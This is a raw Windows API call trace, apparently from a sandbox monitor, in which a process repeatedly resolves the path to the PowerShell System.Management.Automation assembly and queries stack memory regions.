	[0226.662] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29db28, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.662] GetLastError () returned 0x0
	[0226.662] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dad8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.662] GetLastError () returned 0x0
	[0226.662] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dad8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.662] GetLastError () returned 0x0
	[0226.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.663] GetLastError () returned 0x0
	[0226.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.663] GetLastError () returned 0x0
	[0226.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.663] GetLastError () returned 0x0
	[0226.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.663] GetLastError () returned 0x0
	[0226.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.663] GetLastError () returned 0x0
	[0226.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.663] GetLastError () returned 0x0
	[0226.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.664] GetLastError () returned 0x0
	[0226.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.664] GetLastError () returned 0x0
	[0226.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.664] GetLastError () returned 0x0
	[0226.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.664] GetLastError () returned 0x0
	[0226.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.665] GetLastError () returned 0x0
	[0226.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.665] GetLastError () returned 0x0
	[0226.665] VirtualQuery (in: lpAddress=0x29d134, lpBuffer=0x29e134, dwLength=0x1c | out: lpBuffer=0x29e134*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29db28, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.665] GetLastError () returned 0x0
	[0226.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dad8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.665] GetLastError () returned 0x0
	[0226.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dad8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.666] GetLastError () returned 0x0
	[0226.666] VirtualQuery (in: lpAddress=0x29d134, lpBuffer=0x29e134, dwLength=0x1c | out: lpBuffer=0x29e134*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.666] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.666] GetLastError () returned 0x0
	[0226.666] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.666] GetLastError () returned 0x0
	[0226.666] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.666] GetLastError () returned 0x0
	[0226.667] VirtualQuery (in: lpAddress=0x29cd64, lpBuffer=0x29dd64, dwLength=0x1c | out: lpBuffer=0x29dd64*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.667] VirtualQuery (in: lpAddress=0x29cda0, lpBuffer=0x29dda0, dwLength=0x1c | out: lpBuffer=0x29dda0*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.667] VirtualQuery (in: lpAddress=0x29d068, lpBuffer=0x29e068, dwLength=0x1c | out: lpBuffer=0x29e068*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.668] VirtualQuery (in: lpAddress=0x29d0a4, lpBuffer=0x29e0a4, dwLength=0x1c | out: lpBuffer=0x29e0a4*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.669] VirtualQuery (in: lpAddress=0x29d068, lpBuffer=0x29e068, dwLength=0x1c | out: lpBuffer=0x29e068*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.689] VirtualQuery (in: lpAddress=0x29d0a4, lpBuffer=0x29e0a4, dwLength=0x1c | out: lpBuffer=0x29e0a4*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.689] VirtualQuery (in: lpAddress=0x29d0a4, lpBuffer=0x29e0a4, dwLength=0x1c | out: lpBuffer=0x29e0a4*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.689] VirtualQuery (in: lpAddress=0x29d068, lpBuffer=0x29e068, dwLength=0x1c | out: lpBuffer=0x29e068*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.690] VirtualQuery (in: lpAddress=0x29d0a4, lpBuffer=0x29e0a4, dwLength=0x1c | out: lpBuffer=0x29e0a4*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.690] VirtualQuery (in: lpAddress=0x29d068, lpBuffer=0x29e068, dwLength=0x1c | out: lpBuffer=0x29e068*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.690] VirtualQuery (in: lpAddress=0x29d0a4, lpBuffer=0x29e0a4, dwLength=0x1c | out: lpBuffer=0x29e0a4*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.691] VirtualQuery (in: lpAddress=0x29d068, lpBuffer=0x29e068, dwLength=0x1c | out: lpBuffer=0x29e068*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.691] VirtualQuery (in: lpAddress=0x29d0a4, lpBuffer=0x29e0a4, dwLength=0x1c | out: lpBuffer=0x29e0a4*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.691] VirtualQuery (in: lpAddress=0x29cf0c, lpBuffer=0x29df0c, dwLength=0x1c | out: lpBuffer=0x29df0c*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.692] VirtualQuery (in: lpAddress=0x29d068, lpBuffer=0x29e068, dwLength=0x1c | out: lpBuffer=0x29e068*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.692] VirtualQuery (in: lpAddress=0x29d0a4, lpBuffer=0x29e0a4, dwLength=0x1c | out: lpBuffer=0x29e0a4*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.693] VirtualQuery (in: lpAddress=0x29d068, lpBuffer=0x29e068, dwLength=0x1c | out: lpBuffer=0x29e068*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.693] VirtualQuery (in: lpAddress=0x29d0a4, lpBuffer=0x29e0a4, dwLength=0x1c | out: lpBuffer=0x29e0a4*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.693] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x71d8012d, Data2=0xc60b, Data3=0x4cfe, Data4=([0]=0x89, [1]=0xed, [2]=0x54, [3]=0x39, [4]=0x9c, [5]=0x3f, [6]=0x75, [7]=0xf))) returned 0x0
	[0226.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.694] GetLastError () returned 0x0
	[0226.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.694] GetLastError () returned 0x0
	[0226.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.694] GetLastError () returned 0x0
	[0226.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.694] GetLastError () returned 0x0
	[0226.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.694] GetLastError () returned 0x0
	[0226.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.695] GetLastError () returned 0x0
	[0226.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.695] GetLastError () returned 0x0
	[0226.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.695] GetLastError () returned 0x0
	[0226.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.695] GetLastError () returned 0x0
	[0226.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.695] GetLastError () returned 0x0
	[0226.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.695] GetLastError () returned 0x0
	[0226.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.695] GetLastError () returned 0x0
	[0226.696] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.696] GetLastError () returned 0x0
	[0226.696] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.696] GetLastError () returned 0x0
	[0226.696] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.696] GetLastError () returned 0x0
	[0226.697] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.697] GetLastError () returned 0x0
	[0226.697] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.697] GetLastError () returned 0x0
	[0226.697] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.697] GetLastError () returned 0x0
	[0226.697] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.697] GetLastError () returned 0x0
	[0226.697] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.697] GetLastError () returned 0x0
	[0226.697] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.697] GetLastError () returned 0x0
	[0226.698] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.698] GetLastError () returned 0x0
	[0226.698] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.698] GetLastError () returned 0x0
	[0226.698] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.698] GetLastError () returned 0x0
	[0226.698] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.698] GetLastError () returned 0x0
	[0226.698] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.698] GetLastError () returned 0x0
	[0226.698] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.698] GetLastError () returned 0x0
	[0226.699] VirtualQuery (in: lpAddress=0x29cd64, lpBuffer=0x29dd64, dwLength=0x1c | out: lpBuffer=0x29dd64*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
